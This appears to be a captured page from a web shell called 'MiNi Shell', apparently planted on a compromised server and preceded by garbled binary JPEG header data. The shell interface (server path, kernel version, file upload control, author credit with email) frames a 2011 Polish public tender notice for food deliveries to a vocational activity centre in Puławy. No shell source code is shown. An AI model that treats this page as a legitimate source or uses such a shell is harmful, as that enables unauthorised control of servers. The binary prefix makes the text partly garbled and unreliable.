JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20111222/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20111222/435820-N-2011.html

<p class="kh_header"><b>Puławy: dostawa produktów spożywczych dla potrzeb Zakładu Aktywności Zawodowej przy Puławskim Stowarzyszeniu Ochrony Zdrowia Psychicznego</b><br>
<b>Numer ogłoszenia: 435820 - 2011; data zamieszczenia: 22.12.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Aktywności Zawodowej przy Puławskim Stowarzyszeniu Ochrony Zdrowia Psychicznego , ul. Mickiewicza 2a, 24-100 Puławy, woj. lubelskie, tel. 81 888 57 95, faks 81 888 57 95.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zaz.pulawy.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> Nie przewiduje się ustanowienia dynamicznego systemu zakupów ani zastosowania aukcji elektronicznej.</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: stowarzyszenie.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> dostawa produktów spożywczych dla potrzeb Zakładu Aktywności Zawodowej przy Puławskim Stowarzyszeniu Ochrony Zdrowia Psychicznego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa w 2012 roku artykułów żywnościowych dla Zakładu Aktywności Zawodowej w ilościach i częściach określonych poniżej.
Podane ilości produktów składających się na przedmiot zamówienia w danej jego części stanowią wielkości szacunkowe, ustalone dla miesięcznych potrzeb Zamawiającego..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt 7 Pzp, w zakresie każdej części zamówienia, obejmującej produkty należące do tej kategorii zamówienia, które w opisie przedmiotu zamówienia nie zostały wyszczególnione, w ilościach i wartości zgodnej z Pzp bądź też zwiększenia ilości asortymentu w stosunku do wielkości opisanych dla poszczególnych części zamówienia.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 03.00.00.00-1, 15.00.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiajacy nie żąda wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie  wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie	wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie	wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie	wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>- spowodowanej warunkami atmosferycznymi - w przypadku wystąpienia klęski żywiołowej lub gdy warunki atmosferyczne odbiegają od warunków normalnych,
- okoliczności powodujące zmniejszenie zakresu przedmiotu zamówienia; w przypadku zmniejszenia zakresu przedmiotu zamówienia przez Zamawiającego, wynagrodzenie należne Wykonawcy za wykonane zamówienie pozostaje w takim stosunku do umownego wynagrodzenia, w jakim wykonane dostawy pozostają do całości zamówienia określonego umową; 
- zmianie warunków płatności na rzecz Wykonawcy,
- zmianie spowodowanej wystąpieniem siły wyższej, czyli zdarzenia, którego Strony nie mogły przewidzieć i któremu nie mogły zapobiec, ani któremu nie mogą przeciwdziałać, a które uniemożliwia Wykonawcy wykonanie w części lub całości jego zobowiązań, 
- zamawiający dopuszcza zmianę ceny zamówienia brutto (ceny ofertowej) w przypadku urzędowej zmiany stawki podatku VAT. Stawka podatku VAT określana jest zgodnie z ustawą z dnia 11 marca 2004 r. o podatku od towarów i usług (Dz. U. z 2004 r. Nr 54 poz. 535, z późn. zm.),
- zmianie podwykonawcy.
- zmianie polegajacej na waloryzacji zaoferowanej kwoty za poszczególne produkty składajace sie na przedmiot dostawy - wyłącznie w przypadku uzasadnionego wzrostu cen, nie więcej jednak niż o 20% ceny produktu wynikającej z oferty. Powyższa zasada może mieć zastosowanie najwcześniej przy ustalaniu wynagrodzenia Wykonawcy za miesiąc czerwiec 2012 r.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zaz.pulawy.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zakład Aktywności Zawodowej przy Puławskim Stowarzyszeniu Ochrony Zdrowia Psychicznego, ul. Mickiewicza 2a, 24-100 Puławy.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.12.2011 godzina 08:00, miejsce: Zakład Aktywności Zawodowej przy Puławskim Stowarzyszeniu Ochrony Zdrowia Psychicznego, ul. Mickiewicza 2a, 24-100 Puławy.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> dostawa mięsa i wędlin.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> dostawa codziennie od poniedziałku do piątku do godziny 8.00, faktury codziennie, termin płatności - 14 dni, sposób zamawiania- fax, telefonicznie.
L.p.	Asortyment		Ilość
Mięso i wędliny		
1	Antrykot	kg	2,0
2	Boczek wędzony b/k	kg	3,0
3	Ćwiartka z kurczaka	kg	110,00
4	Karczek wp b/k	kg	35,00
5	Kaszanka	kg	5,00
6	Kiełbasa podwawelska	kg	10,00
7	Kiełbasa swojska	kg	10,00
8	Kiełbasa zwyczajna	kg	50,00
9	Kiełbasa biała	kg	10,00
10	Kiełbasa debreczyńska	kg	100,00
11	Korpus drobiowy	kg	60,00
12	 Kura rosołowa	kg	3,00
13	Luncheon meat	kg	1,00
14	Łopatka wieprzowa b/k	kg	80,00
15	Mięso gulaszowe	kg	35,00
16	Mięso mielone firmowe	kg	290,00
17	Mortadela	kg	55,00
18	Pasztet domowy	kg	2,50
19	Parówki drobiowe	kg	4,00
20	Pasztetowa	kg	2,00
21	Piersi drobiowe	kg	25,00
22	Płaty boczkowe	kg	5,00
23	Polędwica indycza	kg	1,00
24	Salami 	kg	0,50
25	Schab	kg	70,00
26	Skrzydło indycze	kg	3,00
27	Słonina	kg	2,00
28	Szynka Lux	kg	20,00
29	Szynka wędzona wiejska	kg	1,00
30	Uda drobiowe	kg	50,00
31	Wątroba drobiowa	kg	35,00
32	Wątroba wp   	kg	35,00.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> dostawa warzyw i owoców.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> dostawa 2 razy w tygodniu, do godziny 6.00, faktury 2 razy        w tygodniu, termin płatności - 14 dni, sposób zamawiania - fax, telefonicznie. 
L.p.	Asortyment		Ilość
Warzywa i owoce		
1	Brokuł	szt.	10
2	Burak ćwikłowy 	kg	15
3	Cebula	kg	90
4	Czosnek	szt	5
5	Kalafior	szt.	25
6	Kapusta biała	kg	210
7	Kapusta kiszona	kg	170
8	Kapusta pekińska	kg	50
9	Kapusta czerwona	kg	110
10	Marchew	kg	550
11	Nać kopru	szt.	20
12	Natka pietruszki	szt.	40
13	Ogórek kiszony	kg	90
14	Ogórek 	kg	125
15	Papryka czerwona	kg	15
16	Pietruszka	kg	25
17	Pieczarka	kg	110
18	Pomidory	kg	90
19	Por	szt.	90
20	Sałata	szt.	130
21	Seler	kg	40
22	Ziemniaki	kg	2700.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.10.00-6, 03.22.23.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> dostawa pieczywa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> - dostawa codziennie od poniedziałku do piątku, do godziny 8.00, faktury zbiorcze co 10 dni, termin płatności - 14 dni, sposób zamawiania - fax, telefonicznie.
L.p.	Asortyment		Ilość
pieczywo		
1	Bułka zwykła	szt.	1050
2	Chleb baltonowski	szt.	100
3	Chleb graham	szt.	12
4	Chleb mieszany  razowy	szt.	17
5	Chleb regionalny krojony	szt.	167
6	Chleb mieszany sit.-soj.	szt.	12
7	Chleb mieszany wileński	szt.	10
8	Chleb słonecznikowy	szt.	12.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.10.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> dostawa ryb.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> dostawa 1 raz w tygodniu, od poniedziałku do piątku, do godziny 10.00, faktura 1 raz w tygodniu, termin płatności - 14 dni, sposób zamawiania - fax, telefonicznie.


L.p.	Asortyment	j.m.	Ilość
ryby		
1	Dorsz filet	kg	40
2	Filet z pangi	Kg	20
3	Matjas śledź	Kg	5.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.20.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> dostawa artykułów spozyczych i jaj.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> dostawa 1 raz w tygodniu, w godzinach pracy Zamawiającego, faktury 1 raz w tygodniu, termin płatności - 14 dni, sposób zamawiania - fax, telefonicznie.
L.p.	Asortyment	Ilość
	
1	Drożdże 100g	2
2	Masło 200 g	15
3	Mleko 2% 1l	50
4	Rama combi profit 3,7l	1
5	Rama cremefine 15% 1l	36
6	Ser żółty gouda 1 kg	6
7	Serek topiony hochland krążek 200 g	4
8	Śmietana 18% 400ml	200
9	Twaróg półtłusty 1 kg	30
10	Barszcz biały 1 kg	6
11	Cukier kryształ 1 kg	40
12	Cukier puder 400 g	2
13	Curry 20 g	4
14	Dżem 280g	2
15	Fasola Jas karłowy 0,5 kg	36
16	Groch łuskany 0,5 kg	24
17	Groszek konserwowy 0,4 g	24
18	Herbata saga 1 opak. (300 szt.)	1
19	Jabłka prażone 0,9 kg	60
20	Kasza gryczana 0,9 kg	42
21	Kasza jęczmienna 5 kg	4
22	Keczup 1 kg	2
23	Koncentrat pomidorowy 970 g	12
24	Koncentrat barszczu 0,3 l	2
25	Kotlet sojowy 100 g 	30
26	Kukurydza konserwowa 425 ml	24
27	Majonez 0,7 kg	12
28	Mąka pszenna 1kg	70
29	Mąka ziemniaczana 1 kg	10
30	Musztarda 180 g	2
31	Ocet 0,5 l	5
32	Ogórek konserwowy 0,9 l	10
33	Olej 0,9 l	45
34	Papryka konserwowa 660 g	1
35	Paprykarz szczeciński 300 g	3
36	Ryż 1 kg	50
37	Soczewica 0,5 kg	10
38	Sól  1kg	40
39	Szczaw konserwowy 300 g	30
40	Szprot w sosie pomidorowym 170 g	3
41	Śledź w pomidorach 170 g	3
42	Tuńczyk w oleju 170 g	3
43	Żelatyna 50g	1
44	Aroma mix maślano-ziołowy 1,1 kg	1
45	Bulion drobiowy 1,2 kg	3
46	Bulion grzybowy 1,2 kg	1
47	Bulion drobiowo-wołowy 1,2 kg	1
48	Cukier waniliowy 16 g	30
49	Bułka tarta 0,5 kg	36
50	Cynamon 150 g	6
51	Czosnek granulowany 0,5 kg	3
52	Delikat do grilla 750 g	1
53	Fix meksykański 1,1 kg	1
54	Fix do gulaszu 1,1 kg	3
55	Fix do potraw chińskich 1,1 kg	1
56	Chrzan 0,3 kg	10
57	Kminek 20 g	25
58	Kwasek cytrynowy 20 g	6
59	Liść laurowy 0,5 kg	1
60	Majeranek 0,5 kg	1
61	Makaron kokardki 2 kg	12
62	Makaron lasagne 2 kg	12
63	Makaron łazanki 2 kg	16
64	Makaron nitka cięta 2 kg	6
65	Makaron spaghetti 1 kg	36
66	Makaron świderki 2 kg	13
67	Makaron wstążka 2 kg	13
68	Marynata do kurczaka 750 g	2
69	Marynata do wieprzowiny 750 g	2
70	Papryka ostra 0,5 kg	6
71	Papryka słodka 0,5 kg	1
72	Peperonata 2,5 kg	1
73	Pieprz czarny 0,5 kg	4
74	Pieprz ziołowy 0,5 kg	6
75	Przyprawa do mięs i grilla maggi 700 ml	1
76	Przyprawa do mięs i grilla 700 g	1
77	Ziele angielskie 0,5 kg	1
78	Przyprawa do bigosu 20 g	10
79	Przyprawa do kurczaka 0,5 kg	3
80	Przyprawa do mięs 0,5 kg	3
81	Przyprawa do ryb 0,5 kg	3
82	Przyprawa delikat 750 g	1
83	Przyprawa gyros 700 g	1
84	Przyprawa jarzynka 2,8 kg	8
85	Sekret szefa drobiowy 0,8 kg	1
86	Sekret szefa wołowy 0,9 kg	1
87	Przyprawa w płynie 0,96 kg	6
88	Rosół consome 1,2 kg	1
89	Rosół drobiowy 1,2 kg	1
90	Rosół o smaku wędzonki 1,2 kg	1
91	Soda oczyszczona 70 g	2
92	Sos bolognese 0,9 kg	6
93	Sos cygański 1,1 kg	1
94	Sos myśliwski maggi 900 ml	3
95	Sos sał. Czosnkowy 0,9 kg	1
96	Sos sał. grecki 0,7 kg	1
97	Sos słodko-kwaśny 1,1 kg	1
98	Sos sał. koperkowy 0,8 kg	2
99	Sos sał. ogrodowy 0,7 kg	2
100	Sos serowy 1,1 kg	3
101	Sos serowy brokułowy 1,1 kg	1
102	Sos sojowy 150 ml	2
103	Sos sał. włoski 0,7 kg	2
104	Sos tomato pronto 3 kg	1
105	Sos węgierski 1,1 kg	1
106	Sos z grzybów leśnych 0,9 kg	3
107	Syrop pomarańcza 6,5 kg	6
108	Syrop truskawka 6,5 kg	6
109	Syrop malina 6,5 kg	6
110	Syrop wiśnia  6,5 kg	6
111	Tymianek 10 g	2
112	Zioła prowansalskie maggi 700 ml	2
113	Zupa borowikowa 0,9 kg	3
114	Zupa barszcz czerwony 1,3 kg	3
115	Zupa cebulowa 1,2 kg	3
116	Zupa ogonowa 0,9 kg	3
117	Zupa pieczarkowa 0,9 kg	3
118	Zupa żur 0,9 kg	3
119	Jaja 1 szt.	850.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 03.14.25.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com